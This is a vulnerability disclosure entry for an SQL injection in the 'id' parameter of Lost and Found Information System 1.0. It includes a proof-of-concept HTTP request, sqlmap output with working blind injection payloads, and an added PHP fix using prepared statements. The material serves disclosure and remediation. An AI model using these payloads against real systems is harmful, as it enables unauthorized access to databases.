Submission #155230: SQL Injection in view category function in Lost and Found Information System

Information

Title: SQL Injection in view category function in Lost and Found Information System
Description:

SQL Injection in view category function in Lost and Found Information System 1.0
parameter: id
Product: Lost and Found Information System
Version: 1.0

PoC:

Request:

GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/php-lfis/admin/?page=categories
Connection: close
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Run request with sqlmap and output:

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb
---
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: huutuanbg97 (UID 45015)
Submitted: 11.05.2023 17:32 (3 years ago)
Moderation: 12.05.2023 08:01 (14 hours later)
Status: accepted
VulDB Entry: 228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category id sql injection]
Points: 20
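The root cause reported above is a GET parameter `id` that reaches a MySQL query as a string literal, which is what the quoted boolean-based and time-based blind payloads exploit. The following PHP is an added illustration, not code from the Lost and Found Information System or from the submitter: it shows the vulnerable query shape beside a fixed handler that validates `id` as an integer and binds it through a prepared statement. The `$pdo` connection, the `categories` table and its `id` column are assumptions for the example.

```php
<?php
// Added example (not the project's own code). Assumes a PDO connection $pdo to the
// MySQL database (ERRMODE_EXCEPTION, emulated prepares off) and a `categories`
// table with an integer primary key `id`; both are assumptions.

// Vulnerable shape: the GET value is concatenated into the SQL string, so a quote
// inside `id` closes the literal and the remainder of the value is parsed as SQL.
// This is exactly what the boolean-based and time-based blind payloads rely on.
function view_category_vulnerable(PDO $pdo, string $id): ?array
{
    $sql = "SELECT * FROM categories WHERE id = '" . $id . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Fixed shape: reject anything that is not a positive integer, then bind the value
// as a typed parameter of a prepared statement so it can never be parsed as SQL.
function view_category_fixed(PDO $pdo, string $id): ?array
{
    $validated = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($validated === false) {
        http_response_code(400);   // e.g. "2' AND 9766=9766 AND 'VGnK'='VGnK" stops here
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM categories WHERE id = :id');
    $stmt->bindValue(':id', $validated, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection setup assumed by the fixed handler (values are placeholders):
// $pdo = new PDO('mysql:host=localhost;dbname=lfis_db;charset=utf8mb4', 'user', 'pass', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,  // server-side prepares, real parameter binding
// ]);
//
// Page handler for admin/?page=categories/view_category&id=2:
// $category = view_category_fixed($pdo, $_GET['id'] ?? '');
```

A log of HTTP 400 responses from this handler, or of `id` values containing quotes or `SLEEP(`, is also a cheap detection signal for the probing shown in the sqlmap output.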